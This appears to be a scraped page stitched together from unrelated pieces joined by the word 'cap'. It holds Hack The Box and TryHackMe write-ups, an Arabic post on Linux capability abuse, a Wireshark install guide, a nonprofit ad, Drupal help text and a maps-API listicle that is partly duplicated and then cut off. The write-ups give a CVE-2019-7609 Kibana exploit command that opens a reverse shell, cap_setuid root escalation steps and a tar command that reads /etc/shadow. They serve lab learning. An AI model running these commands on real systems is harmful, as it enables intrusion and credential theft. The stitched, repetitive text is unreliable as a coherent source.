Get Cape. Wear Cape. Fly I Session I Music-News.com @getcape Watch video here: https://www.youtube.com/watch?v=fr__RCvpMwQ

Get Cape. Wear Cape. Fly I Session I Music-News.com @getcape Watch video here: https://www.youtube.com/watch?v=fr__RCvpMwQ

Hack The Box: Cap - Writeup

Nmap Scan

FTP, port 21

“Vulnerability Insight: A host that provides an FTP service may additionally provide Anonymous FTP access as well. Under this arrangement, users do not strictly need an account on the host. Instead the user typically enters 'anonymous' or 'ftp' when prompted for username. Although users are commonly asked to send their email address as their password, little to no verification is actually performed on the supplied data.”

http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.900600

Unfortunately, the anonymous login exploit didn’t work. Still good to check though!

SSH, port 22

We don’t have the proper credentials to access the server through ssh; at least not yet. We’ll keep this in the back of our minds and come back to this later if and when we find the proper credentials.

HTTP, port 80

HTTP is a web-server so let’s check this from our browser.

Recon

Gobuster

A gobuster scan doesn’t produce additional results that we don’t already see from the web pages. Not too helpful, but still good to check!

After looking through the site, we’ll notice a page with a pcap file.

When we click on this page, we’ll find an empty traffic, but the url tells us that this page is in the data/ directory and we are currently viewing page: 4.

After tweaking the page parameter, we’ll find some traffic.

*** While a couple of other pages also had incoming traffic, after checking them on wireshark, they did not have any meaningful information.

From the /data/0 page, however, we can pick up some interesting information from the downloadable pcap file.

Follow the TCP stream of the pcap file from Wireshark.

In the TCP stream, we’ll find a conversation on Nathan’s FTP (vsFTPd 3.0.3) login credentials

FTP login

Using the credential from the previous step, let’s login to the FTP port

We can find the user flag when we list out the files from our current directory. However, since we’re on a FTP server, we’ll need to download the file first before viewing it.

SSH login

Although we’ve got the user flag, continuing with the FTP server is difficult to navigate through files. Moreover, we’ll need to escalate our privileges from our current position to receive the root flag.

Going back to our open SSH port, we can try using the same credentials from the FTP port; re-used passwords is a common practice by many people, though of course it is a common vulnerability.

Let’s check it out.

TSKTSK, shame on Nathan for using the same password. BUT, good for us attackers. Now that we are in the server as Nathan, we can go back to recon and identify any vulnerabilities.

Privilege Escalation

Linpeas

After serving up a linpeas report from our Kali box, we can download the report on our victim’s machine (nathan@cap) and send it back to our Kali to view. Within the Linpeas report, there is one notable flagged information: the output states a capabilities tab that has python 3.8 – meaning we have a cap_setuid available on the python 3.8 binary.

GTFOBins

With our findings from the previous step, we can check for exploits around the python 3.8 binary on GTFOBins.

GTFOBins a a list of unix binaries that can be “used to by pass local security restrictions in misconfigured systems”. https://gtfobins.github.io/

Since the python capability is already set, and the linpeas report states the 3.8 version of python, we’ll run this script from our victim’s system (nathan@cap).

Check to see if the exploit worked:

And we are ROOT!

Finally, navigate to the root directory and find the root flag.

I've been prototyping a basic testing tool to use as a client against a standard (though rarely implemented) service spec. Straightforward enough spec with three required operations to be implemented: GetCapabilities, DescribeProcess, and Execute. Because it's an over-architected spec developed with too many cooks in the kitchen, it is of course XML.

The test tool is intended to help us when we go to an integration environment, but we don't have a copy of the service against which we're integrating (though for a brief time that vendor did stand one up somewhere we could access with only minimal hoop-jumping). So I spent a day last week trying to find any public providers of the service (remember: it's rarely implemented) that hadn't long ago shut down or moved to other solutions. I found one. I've been developing against it, referencing the schema and the responses from the service.

Yesterday, I noticed that the samples we provide in our documentation use version V2 of the service. The open implementation I'd found with much effort is V1. As is to be expected, the differences between the schemas are significant.

I hate shitty schemas; I hate group-think APIs and specifications; I hate XML.

TryHackMe - Kiba Write Up

This lab is about exploiting the security flaw in the data visualization tool, Kibana; more specifically, the TimeLion application in older versions of Kibana.

I chose this lab because I have experience with the Elastic Stack in the SANS course I took on SIEMs (SEC555) and I've used a fair amount of SIEMs in my every day life at work.

The first flag is one that we'll have to do a little bit of research for. Googling around for Kibana exploitations and here in one of the first sentences I see the answer to our first flag:

#1: What is the vulnerability that is specific to programming languages with prototype-based inheritance?

"Prototype pollution is a vulnerability that is specific to programming languages with prototype-based inheritance (the most common one being JavaScript)."

This site is also where I found the answer to flag #3: What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

CVE-2019-7609

#2: What is the version of visualization dashboard installed in the server?

First, I scanned all ports for the attack box using nmap -p-

Next, I'll want to learn a little bit more about port 5044/tcp and port 5601/tcp.

Through skimming the results, I see HTTP, and /app/kibana. Upon discovering this, I'm going to try and see if I can access the website running on 5601.

And there it is!

Navigating to the Management tab in Kibana, I see that the Version number is 6.5.4 - the answer to our 2nd flag

#4: Compromise the machine and locate user.txt

When doing a little bit more research on the vulnerability order to prepare for the next flag, I found this tenable page which links to a github.

This looks promising! Let's clone the python script and see what we can do with it.

Once cloned, I'm going to look for options.

At this point, I'll need to set up a netcat listener to catch the reverse shell that the script will create. The letters nlvp makes your netcat listener more specific.

n-no DNS lookups.

l- listen for incoming connection

v- verbose output

p- specific source port

To run the exploit that we just downloaded, the info is given there under options:

python CVE-2019-7609-kibana-rce.py -u http://10.10.40.9:5601 -host HOST_IP -port 8888 –shell

-u – is the target URL

-host – this is us! I used the IP under inet tun0 when running ifconfig

-port 8888 – this can be any port so I just used the example's port!

–shell – this is to initiate a reverse shell

Once access is gained, move through the compromised environment to locate user.txt!

There's your next flag!

THM{1s_easy_pwn3d_k1bana_w1th_rce}

#5 How would you recursively list all of these capabilities?

This flag was a little tough for me because I don't intuitively know a lot of linux commands. So googling through "Linux list capabilities"

I found https://man7.org/linux/man-pages/man7/capabilities.7.html

Halfway down the page I found a little more information on capget, getcap, capset, setcap.

Quickly ruling out setcap because it's about setting capabilities not retrieving them in a list.

Upon clicking getcap, I see the options for this command.

Our answer would be getcap -r

Once I confirmed that getcap was the correct command, I wanted to reGoogle this and learn more about escalating privileges with getcap and setcap in order to build my command and see what I can find.

Googling getcap -r and scrolling I found the website above which uses "getcap -r / 2>/dev/null"

Our results let me know I'm getting closer but what is cap_setuid+ep? Back to Google! I'm looking for a command to exploit this "cap_setuid+ep" and this link below shows up:

interesting note here: "it can be used as a backdoor to maintain privileged access by manipulating its own process UID." So setting UID to 0 would make me root.

YES!

Escalate privileges and obtain root.txt

So as you can see when concatenating the root.txt file, I can see the contents and collect the last flag!

I really enjoyed this TryHackMe room. This was a great push for me and I truly feel I learned a lot, not only in the room but with all the Google searches I did to learn more not only about the vulnerability but different ways to escalate privileges in Linux. Definitely added a few websites to my tools bookmarks for future rooms or future reference.

Remote code execution, which is what this exploit was, is "a type of security vulnerability that allows attackers to run arbitrary code on a remote machine, connecting to it over public or private networks."

https://www.imperva.com/learn/application-security/remote-code-execution/#:~:text=Remote%20code%20execution%20(RCE)%20is,over%20public%20or%20private%20networks.

A way to mitigate the Kibana vulnerability is to disable the TimeLion tool in the configuration files. I found that an easy way to do this is to set timelion.enabled to false in the kibana.yml configuration file to disable. An easier way to not fall victim to this vulnerability would be to update to a more recent version of Kibana.

How can I install Wireshark on Debian 11/10/9?. Wireshark is an open-source network analysis and packet capture tool commonly used in the world of Network Engineers. Wireshark is a cross-platform application and it runs on Linux, Windows, and macOS. You can operate it from a GUI or CLI – Your comfort area is the limit!. On Ubuntu, check: How to install Wireshark on Ubuntu Desktop Features of Wireshark Wireshark comes with a rich set of features like: Deep inspection of hundreds of protocols, with more being added all the time Live capture and offline analysis Standard three-pane packet browser Multi-platform: Runs on Windows, Linux, macOS, Solaris, FreeBSD, NetBSD, and many others Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility The most powerful display filters in the industry Rich VoIP analysis Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others Capture files compressed with gzip can be decompressed on the fly Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform) Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2 Coloring rules can be applied to the packet list for quick, intuitive analysis Output can be exported to XML, PostScript®, CSV, or plain textInsta Install Wireshark on Debian 11/10/9 The quickest installation is from Debian repositories. sudo apt update sudo apt install wireshark When asked whether to allow non-superusers to capture packets, select your option and finish the installation. Confirm the version of Wireshark installed on Debian 10 / Debian 9 Desktop. $ apt policy wireshark wireshark: Installed: 3.4.10-0+deb11u1 Candidate: 3.4.10-0+deb11u1 Version table: *** 3.4.10-0+deb11u1 500 500 http://deb.debian.org/debian bullseye/main amd64 Packages 500 http://security.debian.org/debian-security bullseye-security/main amd64 Packages 100 /var/lib/dpkg/status Configure and start Wireshark To be able to capture packets as a normal user, add your user to wireshark group. sudo usermod -a -G wireshark $USER Also change dumpcap binary file permissions. sudo chgrp wireshark /usr/bin/dumpcap sudo chmod 750 /usr/bin/dumpcap sudo setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap Verify: $ sudo getcap /usr/bin/dumpcap /usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip Starting Wireshark on Debian 10 / Debian 9 You can launch Wireshark on Debian 10 / Debian 9 from the terminal or Applications launcher. The same can be done from the command line by typing: $ wireshark Enjoy using Wireshark on Debian 10 (Buster) / Debian 9.

Energy Assistance

GETCAP is a nonprofit that assists with electric and gas bills! The summer heat will be brutal so let us help you pay your electric bill now! To inquire on how to apply visit www.get-cap.org or call 936-232-4051.

Briana Hutchinson

Wpi Drupal

How to designate another person to edit your faculty profile

If you would like to designate another person to edit your profile page, you need to submit this authorization form to [email protected]. Once we receive a signed authorization form, we will grant the designated user the appropriate access rights and send them the instructions below on how to access and edit your profile.

Browse other questions tagged drupal alfresco drupal-8 document-management or ask your own question. The Overflow Blog Podcast 328: For Twilio’s CIO, every internal developer is a customer. Client: Worcester Polytechnic Institute Project: Art Direction, UXUI Design Web Platform: Drupal Beginning in 2015, WPI began a multi-year, university-wide initiative to blow up their website and build an entirely new digital presence on the Drupal platform: a brand new WPI.edu. Registration: Drupal Training If you need assistance with Drupal prior to taking the training class, please submit your change requests to the marketing helpdesk at [email protected]. IMPORTANT: Your department head will be notified once you submit this form and they will need to authorize the request for editing access to your office/department.

Drupal Drupal is an open source content management system for managing the wpi.edu domain. Within this site we offer you assistance in training with online documentation and tutorials. As a Drupal user, you are able to add department announcements, create university calendar events, customize your website with widgets, and edit your own profile.

Workday Fields

The following fields on profile pages must be edited in Workday:

Preferred Name (if you do not have a preferred name, your legal name will be used)

Primary Title*

Department*

Phone

*Please contact Human Resources to request changes to these fields.

Editing a faculty profile in Drupal is easy to do! Just follow our step-by-step instructions or watch the video below.

Wpi Drupal

how to edit faculty profile in drupal

If you've been appointed by a faculty member to edit their profile page, follow the instructions below on how to log into their Drupal account or watch the video below.

how to masquerade in drupal

Need Help?

Group Posts

Wpi Drupal Login

Conceptual model for general purpose resource metadata

JSON template for a 'complete' metadata record

Scenario for a community metadata editor

Really Generic Functional Requirements for Metadata

Energy Industry Profile of ISO/DIS 19115-1 v1.0 Release Candidate is Available for Public Review

USGIN/NGDS Presentations at ESRI User Conference

Installing/Using Git Version/Revision/Source Control System on local network

Usgin Draft Specifications For Geoscience Resource Metadata And Identifiers

Recommendations for metadata content to describe geoscience resources

Converting FGDC XML metadata records for WMS and WFS services to ISO 19139 via Python and GeoNetwork

Create a GeoNetwork OGC Harvest Node (WMS or WFS GetCapabilities to ISO 19139 metadata) through xml.harvesting.add request

Running Drupal on a Windows Server 2008 machine

Creating a Format Agnostic Metadata Wizard

Presentation, USGS Menlo Park, 04/15/2010

Drupal Content Types used in the USGIN Document Repository

Pt2[Linux Privilege Escalation Techniques] Capabilities [Missconfiguration]

السلام عليكم ورحمة وبركاتة،

تكمله لسلسلة Linux Privilege Escalation Techniques راح نتكلم عن Capabilities في اللينكس

تعريف عن الCapabilities في الينكس هي تقريبأ نفس تصاريح setuid + setguid بس بشكل ادق في مقدره باتحديد  لتنفيذ امر معين بنفس صلاحيات . اي انه بستطاعه المصرح ان يحدد اي عمليه يقوم بها الباينري بالعمل به، مثال لو فرضنا لدينا باينيري اسمه nbyte يقوم بالقراءه وتنفيذ الاومر،وحددنا له  القدره/التصريح على القراءه فقط بصلاحيات اليوزر المصرح، الا وهو الروت. راح ينفذ طبيعي باليوزر المنفذ ولكن القراءه راح يقراء مثل صلاحيات المصرح (روت) لنه المصرح وضع له المقدره بألقراءه ع السيرفر.وهنا يكمن التصعيد.

ناخذ بعضها حسب الاهمية والخطورة

Capabilities list

CAP_SYS_ADMIN

CAP_DAC_OVERRIDE

CAP_DAC_READ_SEARCH

CAP_SYS_CHROOT

CAP_SETFCAP

CAP_SETGID

  CAP_SETUID

http://man7.org/linux/man-pages/man7/capabilities.7.html

وغيرها كثير تعتبر خطره اتركها لكم للاستكشاف. ناخذ مثال،

في البداية نستخرج Capabilities الموضوعه داخل الباينيرز الموجوده في السيرفر

getcap -r / or getcap -r / 2>/dev/null

كما نلاحظ وجود /bin/tac محدد له

 CAP_DAC_READ_SEARCH

 CAP_DAC_READ_SEARCH

نرجع للman تبعCapabilities ونلاحظ

 اي انه بستطاعتنا القراءه الملفات.نجرب

والناتج 

ناخذ مثال اخر على tar

نرجع نشوف الموقع 

اي بستطاعتنا القراءه والاستعراض

الان نجي للتنفيذ او القراءه من ال امر tar

tar -c --checkpoint=1000 --checkpoint-action=echo /etc/shadow

اترك لكم الباقي للاستكشاف

في النهاية تعتمد على الباينري والتحديد ع القدره فيها لكي يتم تصعيد الصلاحيات. دمتم بود.

via Blogger http://bit.ly/2IsTsHx

Get Cape. Wear Cape. Fly I Session I Music-News.com @getcape Watch video here: https://www.youtube.com/watch?v=elMig2qRAcI

Get Cape. Wear Cape. Fly I Session I Music-News.com @getcape Watch video here: https://www.youtube.com/watch?v=elMig2qRAcI

3 Web Map Service (WMS) Requests for images of map data Point based query functionality Main operations: –GetCapabilities: Metadata about the types/operations the WMS supports –GetMap Map of the requested data –GetFeatureInfo Feature information about a particular point within a map Open source implementations –UMN Map Server –GeoServer

Design your way http://j.mp/2fAFioL

You’d be surprised how many sites use maps APIs to generate the maps that you see when visiting their sites. It’s always easier to use a maps API.

Digital maps and automated mapping tools are constantly growing in popularity, and this trend doesn’t seem to go down any time soon.

With Google Maps API holding the leadership on this list, companies are competing harshly to become the best-of-breed, leading product in the industry.

This doesn’t come as a surprise, as maps are very informative, useful, interesting, and engaging, and there is no one who’d disapprove of them.

Map fans lately have no troubles enjoying both static and interactive maps on almost any app or website. The reason is that map data is now open to use by third-party developers and aficionados, and made flexible enough to blend in different data sets and to display a wide range of species and specie lists wherever in the world they are needed.

The Map of Life, for instance, is both useful and fun, and so is the Zombie Apocalypse Survival Map which actually locates hospitals, grocery stores, warehouses, and similar ‘danger zones’. Basically, the point is to make information maps accessible to all users in real-time, and from the comfort of their favorite websites and applications.

Let’s give a look to several popular maps APIs

Google Maps

The leader of interactive mapping is without doubt Google Maps, which also makes its API data publicly available for interested developers. Therefore, it is not surprising that most websites and apps nowadays with a simple JavaScript/Flash interface have these apps embedded on their interface.

Google Maps APIs work perfectly on desktop and mobile devices, providing point-to-point localizations in more than 50 languages. You will also be offered with some advanced services and mechanisms, such as intranet mapping, and secure HTTP connections for Premier customers.

Amazon Maps API

Amazon Maps APIs are developers best alternative for the creation of Fire phone and Fire tablet applications. The current version of these APIs (2.0) enables support for interactive and 3D maps, enriched with top-quality landmarks, location data, satellite tiles, highlighted areas, and best-of-breed vector mapping. In order to apply for these APIs, submit a direct request to the vendor, or download the Amazon Mobile SDK to ensure that the languages are compatible.

Bing Maps

Microsoft Bing Maps is another extremely popular and powerful mapping tool, still working its way to get a share of Google Maps users. Microsoft is doing a great job following trends and adding innovations, which is why it recently introduced the Streetside city addition with high-resolution aerial images on all Bing maps. Another new feature you should keep n the loop is 3-D city previews.

Carto

Carto was designed for open-source mapping, visualization, and analysis of different maps. Its powerful engine gives developers the possibility to launch geospatial maps and applications for wide web usage. Despite of being on the market for only 5 years, Carto already has a large list of prominent users, among which NASA, National Geographic, Twitter, and The Guardian UK.

Another distinctive advantage of this engine is flexible pricing, as plans go all the way from free and basic to premium and enterprise-friendly.

Carto comes equipped with a rich JavaScript library, and gives developers great API sets to include its engaging geospatial visualizations on their sites and apps. Inside, you will also find a no-brainer drag-and-drop editor to choose the way in which you will use and visualize data. Public information and documentation is available on their website.

DigitalGlobe

DigitalGlobe is a cloud-hosted solution for high-resolution maps that uses API to embed its beautiful and scalable content to any web and mobile application. Developers appreciate the access to terrain, satellite, and vector content, and the possibility to build their own location-based and attractive map applications.

Leaflet

Leaflet is a suite of modern vector layers and maps which you can add to any web service. The very same suite is used to monitor map events alike zoom and pan, and fetches these features automatically for each event. It is best used for large and interactive data sets that you don’t want to load at once. The service offers PostGIS APIs for developers to access its features with REST calls.

Mapbox

Mapbox offers a variety of open-source and free aping features. Its APIs are best suited for creative developers looking to combine multiple databases and file formats. Premade, Android and iOS-compatible maps will be available to embed on any website and to share with wider audiences.

Naver Maps

Naver Maps is a Korean mapping service that offers JavaScript APIs. At the moment, these APIs are in their beta stage of development, which means that geocoding is still not available. Another drawback is that assistance materials are all distributed in Korean, but some of them, as class references, for instance, are fairly easy to understand.

Scribble Maps

Scribble Maps is a creative platform used for sharing and drawing maps. All maps created with it can be shared with external users, and all functionality can be easily embedded on developers’ websites and applications. The platform uses interesting API methods and techniques, as for instance retrieving map images, sharing and displaying apps, and more.

Yahoo! Maps

Despite of Yahoo being a leading search engine for years, its BOSS PlaceFinder flagship API service was launched only in July 2010. These APIs make it possible for programmers to access its geocoding web services and attach them to their applications, as well as to build ‘location-aware’ apps with their names and addresses neatly translated to geographic coordinates.

PlaceFinder is also one of the best alternatives to transform these coordinates back into place names and addresses.

As expected, BOSS PlaceFinder provides users with adequate and well-organized documentation, and makes it incredibly easy to launch its API services. The price will depend on the number of queries you wish to provide on daily basis, keeping in mind that Yahoo will also supply you with some ads to monetize your content.

Yandex

Yandex is Russia’s leading search engine. In a Google-reminiscent manner, this search engine supplies developers with an array of internet products and services, including the possibility to use its functions on their websites, apps, and blogs.

Given that it serves a large market, Yandex offers one of the largest Direct API suites for developers to access its contextual advertising service, and run it on their apps for direct interactions. If you own an advertising agency, for instance, this will make even more sense, as Yandex lets you organize and run large-scale and complex campaigns. For the purpose, it employs a SOAP protocol, and returns responses in JSON format.

Mapwize

Mapwize is an indoor mapping platform with APIs that allow developers to enable similar services on their apps and websites. The platform can serve a multitude of purposes, among which building maps for offices, healthcare facilities, retail stores, and educational institutions. The price you’d pay to get these APIs depends on the size of the building you’re mapping and the number of occupants or visitors that are expected to use it.

US County Boundary

The US County Boundary APIs, as suggested by the name, are used to display the boundaries between all US counties. The RESTful APIs are built using NodeJS language, and work with requests and responses formatted as JSON. The service is offered by an independent developer, and can therefore only be used for non-commercial and non-proprietary purposes.

Carto Data

CartoData’s APIs pair isoline and geocoding services deriving from CARTO Editor. They rely on a PostgreSQL database, and make it possible to geocode data arranged in complete datasets, rows, and manually inputted lists. With authenticated requests, you can also use these APIs to perform programmatic analyses of trade areas (computing isochrones and isodistances).

CartoData’s APIs are built using CARTO SQL APIs, and will thereof provide enough SQL documentation to make debugging errors easier for developers. The tool is an open-source one, and provides unlimited access to scalable maps and dynamic geospatial databases for your websites and application. Its interface is intuitive and predictive, and drafts some of the best location insights worldwide.

TomTom

TomTom is another popular set of online map APIs, and a powerful portal for digital navigation that consists of different web map tile services (WMTS and WMS). For each set of APIs there will be separate training & documentation, as TomTom enables you to transform even high-volume location data into high resolution images, and make it accessible for thousands of users at the same time.

The Online Maps Tiles use grid to divide your maps into separate tiles, and zoom those at even 19 levels to make each feature clearly visible. The reason why TomTom is so powerful is that it was designed primarily for GIS software clients (Quantum GIS an ArcGIS, for instance), which needed an end-to-end WMS API platform that will interact with their entire web mapping service.

The operational infrastructure of these APIs evolved significantly throughout the years, and is now equipped with GetCapabilities functions to retrieve service metadata and create maps within defined set boundaries. WMTS APIs, on the other hand, will work better for conveying metadata map resources.

Want to see more maps APIs?

Read on.

Spatial

Spatial is a REST API suite developers use to access and embed Spatial functions on their new and existent applications. A great example of how Spatial APIs work is embedding ready-to-use maps with points of interests, and retrieving listing points and events on each map. Spatial is also integrated with social networks, and makes it possible to enrich your profiles with beautiful maps.

FINOU

FINOU is a very interactive mapping platform developed in (and for the needs) of the Moroccan market. Its APIs are used to integrate the service on different websites and applications. Developers will obtain tools such as location search, geocoding, map tiles, and more.

AirMap

AirMap consists of tools used to create GIS and a variety of drone management application. Using its APIs, you will have access to notice requirements, advisory information, airspace interaction rules, and much more. Responses are generated in JSON format, for developers who possess the right API key.

An interesting fact is that AirMap sources individual data, and won’t require drone developers and manufacturers to come up with such form their airspace databases. The product belongs to a popular Californian airspace technology company.

ViaMichelin

ViaMichelin’s Web Services & Maps also make their API public and available to developers who use JavaScript. They offer a static library using 4 mapping styles: the native ViaMichelin, hybrid, satellite, and Methods that let users control their layers, polygons, markers, and other elements.

NASA Earth

NASA Earth also provides APIs to make Earth observation data available to all users. The sercie is powered and managed by Google’s Earth Engine, and combines a Landsat 8 image gallery with NASA satellite data being updated in a period of 16 days. Basically, the user can browse through this database for an image of every specific place, taken at a specific day.

Mapme

Mapme API is a RESTful-moderated map builder. At the moment, this service is mounted on Google Maps API, in order to ease the creation, configuration, and distribution of map content. Its custom made apps will include multiple tags, layers, crowdsourcing moderations, privacy settings, activity feeds, mobile compatibility, and many other advanced features.

Detailed documentation and hands-on support for HTTP/HTTPS will also be provided, with responses arriving in JSON formats.

NavVis

If interested to integrate NavVis’s services on your app/website, check out their open APIs. Unfortunately, there is no public info or documentation provided, and you have to create an account in order to obtain a personal key. NavVis can be used both as an indoor navigator and an indoor mapping tool.

One Map

One Map is a Singapore geolocation system that also offers open API to integrate its services on other applications. It works with API key authentication and REST protocols, and invites developers to mash-up its APIs with JavaScript ones, and put in action services such as Agency Data, Address Search, Static Maps, and other advanced mashups.

UKMap

UKMap is the best-known provider of large-scale London maps, which is why many developers want to see its services embedded on their applications. At the moment, UKMap displays more than 100 million info points, among which roads, buildings, pavements, land use and land cover, retail locations, trees, fences, digital terrains, and much more. The service was developed and belongs to The GeoInformation Group, UK.

Mapzen

Mapzen’s Search APIs are devoted to developers who’d like to see this service embedded on their applications. The service will later on become available to visitors and end users, with a free API key that can be obtained by simply contacting the vendor. This makes Mapzen a highly-preferred open-source mapping tool, especially because its search engine operates worldwide, and turns all names and addresses in actual geographic locations (and vice versa).

Pointpin

Pointpin APIs are applied by developers to embed Pointpin services on their sites and applications, and to enable some IP geolocation info for their end users. In order to use these APIs you need a special key, as Pointpin functions as a hosted IP geolocation.

AboutPLACE

AboutPLACE’s RESTful API help developers turn place-based information into an interactive map. Built in Beta, these APIs are available for Miami, Austin, and Boston, and provide all users with unique access keys obtained upon registration.

Developers use these APIs to access local maps, but also metrics, analytics, visualizations, and similar insights on the specified cities. With information like this, they can enhance their own datasets and make results hyper-localized.

If you liked this article with maps APIs, you should check out these articles as well:

Google APIs That You Can Use

12 Useful AngularJS Boilerplates

WordPress boilerplates to use for your themes and plugins

Web APIs for non-programmers

What are the Benefits of APIs?

The post Maps APIs To Use In Your Projects appeared first on Design your way.

http://j.mp/2fAEaBk via Design your way URL : http://j.mp/2arS45r

Maps APIs To Use In Your Projects

You’d be surprised how many sites use maps APIs to generate the maps that you see when visiting their sites. It’s always easier to use a maps API.

Digital maps and automated mapping tools are constantly growing in popularity, and this trend doesn’t seem to go down any time soon.

With Google Maps API holding the leadership on this list, companies are competing harshly to become the best-of-breed, leading product in the industry.

This doesn’t come as a surprise, as maps are very informative, useful, interesting, and engaging, and there is no one who’d disapprove of them.

Map fans lately have no troubles enjoying both static and interactive maps on almost any app or website. The reason is that map data is now open to use by third-party developers and aficionados, and made flexible enough to blend in different data sets and to display a wide range of species and specie lists wherever in the world they are needed.

The Map of Life, for instance, is both useful and fun, and so is the Zombie Apocalypse Survival Map which actually locates hospitals, grocery stores, warehouses, and similar ‘danger zones’. Basically, the point is to make information maps accessible to all users in real-time, and from the comfort of their favorite websites and applications.

Let’s give a look to several popular maps APIs

Google Maps

The leader of interactive mapping is without doubt Google Maps, which also makes its API data publicly available for interested developers. Therefore, it is not surprising that most websites and apps nowadays with a simple JavaScript/Flash interface have these apps embedded on their interface.

Google Maps APIs work perfectly on desktop and mobile devices, providing point-to-point localizations in more than 50 languages. You will also be offered with some advanced services and mechanisms, such as intranet mapping, and secure HTTP connections for Premier customers.

Amazon Maps API

Amazon Maps APIs are developers best alternative for the creation of Fire phone and Fire tablet applications. The current version of these APIs (2.0) enables support for interactive and 3D maps, enriched with top-quality landmarks, location data, satellite tiles, highlighted areas, and best-of-breed vector mapping. In order to apply for these APIs, submit a direct request to the vendor, or download the Amazon Mobile SDK to ensure that the languages are compatible.

Bing Maps

Microsoft Bing Maps is another extremely popular and powerful mapping tool, still working its way to get a share of Google Maps users. Microsoft is doing a great job following trends and adding innovations, which is why it recently introduced the Streetside city addition with high-resolution aerial images on all Bing maps. Another new feature you should keep n the loop is 3-D city previews.

Carto

Carto was designed for open-source mapping, visualization, and analysis of different maps. Its powerful engine gives developers the possibility to launch geospatial maps and applications for wide web usage. Despite of being on the market for only 5 years, Carto already has a large list of prominent users, among which NASA, National Geographic, Twitter, and The Guardian UK.

Another distinctive advantage of this engine is flexible pricing, as plans go all the way from free and basic to premium and enterprise-friendly.

Carto comes equipped with a rich JavaScript library, and gives developers great API sets to include its engaging geospatial visualizations on their sites and apps. Inside, you will also find a no-brainer drag-and-drop editor to choose the way in which you will use and visualize data. Public information and documentation is available on their website.

DigitalGlobe

DigitalGlobe is a cloud-hosted solution for high-resolution maps that uses API to embed its beautiful and scalable content to any web and mobile application. Developers appreciate the access to terrain, satellite, and vector content, and the possibility to build their own location-based and attractive map applications.

Leaflet

Leaflet is a suite of modern vector layers and maps which you can add to any web service. The very same suite is used to monitor map events alike zoom and pan, and fetches these features automatically for each event. It is best used for large and interactive data sets that you don’t want to load at once. The service offers PostGIS APIs for developers to access its features with REST calls.

Mapbox

Mapbox offers a variety of open-source and free aping features. Its APIs are best suited for creative developers looking to combine multiple databases and file formats. Premade, Android and iOS-compatible maps will be available to embed on any website and to share with wider audiences.

Naver Maps

Naver Maps is a Korean mapping service that offers JavaScript APIs. At the moment, these APIs are in their beta stage of development, which means that geocoding is still not available. Another drawback is that assistance materials are all distributed in Korean, but some of them, as class references, for instance, are fairly easy to understand.

Scribble Maps

Scribble Maps is a creative platform used for sharing and drawing maps. All maps created with it can be shared with external users, and all functionality can be easily embedded on developers’ websites and applications. The platform uses interesting API methods and techniques, as for instance retrieving map images, sharing and displaying apps, and more.

Yahoo! Maps

Despite of Yahoo being a leading search engine for years, its BOSS PlaceFinder flagship API service was launched only in July 2010. These APIs make it possible for programmers to access its geocoding web services and attach them to their applications, as well as to build ‘location-aware’ apps with their names and addresses neatly translated to geographic coordinates.

PlaceFinder is also one of the best alternatives to transform these coordinates back into place names and addresses.

As expected, BOSS PlaceFinder provides users with adequate and well-organized documentation, and makes it incredibly easy to launch its API services. The price will depend on the number of queries you wish to provide on daily basis, keeping in mind that Yahoo will also supply you with some ads to monetize your content.

Yandex

Yandex is Russia’s leading search engine. In a Google-reminiscent manner, this search engine supplies developers with an array of internet products and services, including the possibility to use its functions on their websites, apps, and blogs.

Given that it serves a large market, Yandex offers one of the largest Direct API suites for developers to access its contextual advertising service, and run it on their apps for direct interactions. If you own an advertising agency, for instance, this will make even more sense, as Yandex lets you organize and run large-scale and complex campaigns. For the purpose, it employs a SOAP protocol, and returns responses in JSON format.

Mapwize

Mapwize is an indoor mapping platform with APIs that allow developers to enable similar services on their apps and websites. The platform can serve a multitude of purposes, among which building maps for offices, healthcare facilities, retail stores, and educational institutions. The price you’d pay to get these APIs depends on the size of the building you’re mapping and the number of occupants or visitors that are expected to use it.

US County Boundary

The US County Boundary APIs, as suggested by the name, are used to display the boundaries between all US counties. The RESTful APIs are built using NodeJS language, and work with requests and responses formatted as JSON. The service is offered by an independent developer, and can therefore only be used for non-commercial and non-proprietary purposes.

Carto Data

CartoData’s APIs pair isoline and geocoding services deriving from CARTO Editor. They rely on a PostgreSQL database, and make it possible to geocode data arranged in complete datasets, rows, and manually inputted lists. With authenticated requests, you can also use these APIs to perform programmatic analyses of trade areas (computing isochrones and isodistances).

CartoData’s APIs are built using CARTO SQL APIs, and will thereof provide enough SQL documentation to make debugging errors easier for developers. The tool is an open-source one, and provides unlimited access to scalable maps and dynamic geospatial databases for your websites and application. Its interface is intuitive and predictive, and drafts some of the best location insights worldwide.

TomTom

TomTom is another popular set of online map APIs, and a powerful portal for digital navigation that consists of different web map tile services (WMTS and WMS). For each set of APIs there will be separate training & documentation, as TomTom enables you to transform even high-volume location data into high resolution images, and make it accessible for thousands of users at the same time.

The Online Maps Tiles use grid to divide your maps into separate tiles, and zoom those at even 19 levels to make each feature clearly visible. The reason why TomTom is so powerful is that it was designed primarily for GIS software clients (Quantum GIS an ArcGIS, for instance), which needed an end-to-end WMS API platform that will interact with their entire web mapping service.

The operational infrastructure of these APIs evolved significantly throughout the years, and is now equipped with GetCapabilities functions to retrieve service metadata and create maps within defined set boundaries. WMTS APIs, on the other hand, will work better for conveying metadata map resources.

Want to see more maps APIs?

Read on.

Spatial

Spatial is a REST API suite developers use to access and embed Spatial functions on their new and existent applications. A great example of how Spatial APIs work is embedding ready-to-use maps with points of interests, and retrieving listing points and events on each map. Spatial is also integrated with social networks, and makes it possible to enrich your profiles with beautiful maps.

FINOU

